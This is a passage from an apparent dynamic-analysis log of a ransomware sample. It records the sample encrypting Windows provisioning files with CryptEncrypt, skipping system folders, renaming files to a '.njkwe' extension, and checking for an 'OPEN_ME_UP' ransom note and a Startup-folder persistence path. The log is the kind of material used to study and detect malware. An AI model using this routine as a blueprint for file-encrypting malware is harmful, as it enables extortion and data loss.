lpNewFilePointer=0xffffffff) returned 1 [0078.597] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0078.597] GetProcessHeap () returned 0xbe0000 [0078.597] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.597] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.598] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.598] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.598] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.598] CloseHandle (hObject=0x43c) returned 1 [0078.598] GetProcessHeap () returned 0xbe0000 [0078.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.598] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0078.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\361__connections_cellular_megafon (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\361__Connections_Cellular_MegaFon (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\361__connections_cellular_megafon (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.599] GetProcessHeap () returned 0xbe0000 [0078.599] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.599] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d4f224, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d4f224, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d4f224, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1c6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="362__C~1.PRO")) returned 1 [0078.612] lstrcmpiW (lpString1="362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.612] lstrcmpiW (lpString1="362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.612] lstrcmpiW (lpString1="362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.612] lstrcmpiW (lpString1="362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.612] lstrcmpiW (lpString1="362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.612] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.612] StrStrIW (lpFirst="362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.612] lstrcmpW (lpString1="362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.612] lstrcmpW (lpString1="362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.612] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\362__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.612] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\362__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.612] GetTickCount () returned 0x1153fb5 [0078.613] GetTickCount () returned 0x1153fb5 [0078.613] GetTickCount () returned 0x1153fb5 [0078.613] GetTickCount () returned 0x1153fb5 [0078.613] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.613] GetProcessHeap () returned 0xbe0000 [0078.613] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.613] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1c6, lpOverlapped=0x0) returned 1 [0078.614] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.614] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1c6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1c6, lpOverlapped=0x0) returned 1 [0078.614] GetProcessHeap () returned 0xbe0000 [0078.614] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.614] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.614] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.615] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.615] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.615] CloseHandle (hObject=0x43c) returned 1 [0078.615] GetProcessHeap () returned 0xbe0000 [0078.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.615] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\362__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\362__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\362__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.616] GetProcessHeap () returned 0xbe0000 [0078.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.616] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d4f224, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d4f224, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d4f224, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="363__C~1.PRO")) returned 1 [0078.616] lstrcmpiW (lpString1="363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.616] lstrcmpiW (lpString1="363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.616] lstrcmpiW (lpString1="363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.616] lstrcmpiW (lpString1="363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.616] lstrcmpiW (lpString1="363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.616] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 168 [0078.616] StrStrIW (lpFirst="363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.616] lstrcmpW (lpString1="363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.616] lstrcmpW (lpString1="363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.616] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\363__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.616] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\363__connections_cellular_mts (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.616] GetTickCount () returned 0x1153fb5 [0078.616] GetTickCount () returned 0x1153fb5 [0078.616] GetTickCount () returned 0x1153fb5 [0078.616] GetTickCount () returned 0x1153fb5 [0078.616] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.617] GetProcessHeap () returned 0xbe0000 [0078.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.617] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0078.618] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.618] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0078.619] GetProcessHeap () returned 0xbe0000 [0078.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.619] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.619] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.619] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.619] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.619] CloseHandle (hObject=0x43c) returned 1 [0078.619] GetProcessHeap () returned 0xbe0000 [0078.619] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.619] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0078.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\363__connections_cellular_mts (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\363__Connections_Cellular_MTS (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\363__connections_cellular_mts (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.620] GetProcessHeap () returned 0xbe0000 [0078.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.620] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d4f224, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d4f224, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d4f224, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="364__C~1.PRO")) returned 1 [0078.620] lstrcmpiW (lpString1="364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.620] lstrcmpiW (lpString1="364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.620] lstrcmpiW (lpString1="364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.620] lstrcmpiW (lpString1="364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.620] lstrcmpiW (lpString1="364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.620] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.620] StrStrIW (lpFirst="364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.620] lstrcmpW (lpString1="364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.620] lstrcmpW (lpString1="364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.620] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\364__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.620] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\364__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.620] GetTickCount () returned 0x1153fb5 [0078.621] GetTickCount () returned 0x1153fb5 [0078.621] GetTickCount () returned 0x1153fb5 [0078.621] GetTickCount () returned 0x1153fb5 [0078.621] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.621] GetProcessHeap () returned 0xbe0000 [0078.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.621] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0078.622] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.622] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0078.622] GetProcessHeap () returned 0xbe0000 [0078.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.622] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.622] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.626] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.626] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.626] CloseHandle (hObject=0x43c) returned 1 [0078.626] GetProcessHeap () returned 0xbe0000 [0078.627] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.627] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.627] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\364__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\364__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\364__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.627] GetProcessHeap () returned 0xbe0000 [0078.627] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.627] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d4f224, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d4f224, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d4f224, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="365__C~1.PRO")) returned 1 [0078.627] lstrcmpiW (lpString1="365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.627] lstrcmpiW (lpString1="365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.627] lstrcmpiW (lpString1="365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.627] lstrcmpiW (lpString1="365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.627] lstrcmpiW (lpString1="365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.627] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 168 [0078.627] StrStrIW (lpFirst="365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.627] lstrcmpW (lpString1="365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.627] lstrcmpW (lpString1="365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.627] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\365__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.628] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\365__connections_cellular_ncc (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.628] GetTickCount () returned 0x1153fc4 [0078.628] GetTickCount () returned 0x1153fc4 [0078.628] GetTickCount () returned 0x1153fc4 [0078.628] GetTickCount () returned 